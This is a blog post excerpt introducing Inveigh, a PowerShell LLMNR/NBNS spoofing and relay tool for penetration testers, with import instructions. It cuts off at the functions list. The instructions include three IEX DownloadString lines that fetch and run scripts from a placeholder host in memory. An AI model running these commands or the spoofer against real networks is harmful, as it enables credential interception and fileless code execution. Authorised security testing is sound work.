Posts

Showing posts with the label Windows PowerShell LLMNR/NBNS spoofer: Inveigh

Windows PowerShell LLMNR/NBNS spoofer: Inveigh

Image
Windows PowerShell LLMNR/NBNS spoofer      Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. Import To import with Import-Module: Import-Module ./Inveigh.psd1 To import using the dot source method: . ./Inveigh.ps1 . ./Inveigh-BruteForce.ps1 . ./Inveigh-Relay.ps1 To load into memory using Invoke-Expression: IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh.ps1”) IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh-Unprivileged.ps1”) IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh-Relay.ps1”) System Requirements Tested minimums are PowerShell 2.0 and .NET 3.5 Functions Invoke-Inveigh The main Inveigh LLMNR/NBNS spoofer function. Privilege Requireme...